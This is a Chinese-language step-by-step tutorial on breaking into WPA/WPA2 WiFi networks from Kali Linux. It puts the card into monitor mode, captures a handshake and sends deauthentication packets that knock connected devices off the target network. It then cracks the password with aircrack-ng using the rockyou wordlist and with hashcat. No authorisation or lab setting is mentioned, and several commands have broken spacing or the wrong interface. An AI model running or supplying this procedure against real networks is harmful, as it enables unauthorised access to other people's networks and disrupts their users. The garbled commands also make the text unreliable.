前言准备
1:kali系统
2:网卡(能启动ap功能)
3:字典(用于破解跑密码使用)
开始
1
查看网卡是否支持监听模式
airmon-ng
wlan0代表我的网卡,也说明支持监听模式
2
开启监听模式
airmon-ng startwlan0
执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看
ifconfig
3
查看WiFi网络
airodump-ng wlan0
此时,会列出了周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。记住要破解wifi的频道号和BSSID。按Ctrl-C结束
4
抓取握手包
airodump-ng wlan0mon
开始抓包
airodump-ng -c<频道号>--bssid<目标>-w ~/01 wlan0mon
参数解释
-c指定频道号
–bssid指定路由器bssid
-w指定抓取的数据包保存位置
注意此处的空格
5
强制攻击wifi的设备重新连接路由器
经过步骤④,我们需要等用户连接/重连接wifi,才能抓到包,此时,就可能需要很长时间,因为并比一定一定有新用户连接此WiFi,所以,我们需要迫使用户连接WiFi
打开新终端执行
aireplay-ng -0 <攻击次数>-a <被攻击AP的MAC>-c <连接的设备>wlan0mon
参数解释
-0表示发起deauthentication攻击
-a指定无线路由器BSSID
-c指定强制断开的设备
注意此处代码空格。
如果成功,会如下图
得到wpa handshake后,按Ctrl-C结束
我们已经得到了想要的握手包了,可以结束无线网卡的监控模式
airmon-ng stopwlan0mon
6
开始破解密码
aircrack-ng- a2 -b <目标> -w /usr/share/wordlists/rockyou.txt~/*.cap
参数解释
-a2代表WPA的握手包
-b指定要破解的wifi BSSID。
-w指定字典文件
-最后是抓取的包。
然后就是等待了,可能几分钟,也可能几个小时,这就根据电脑性能和密码的复杂程度了。如果不成功,可使用其他字典,再破解
7
用hashcat破解
在线将cap转为hccap格式
网址 https://hashcat.net/cap2hccapx/
用aircrack-ng把cap转换成hccap类型数据包
aircrack-ng <目标.cap>-J <保存名字>
使用用hashcat破解WPA/PSK密码
hashcat-m2500 名字hccap字典.txt
( -m 2500为破解的模式为WPA/PSK方式)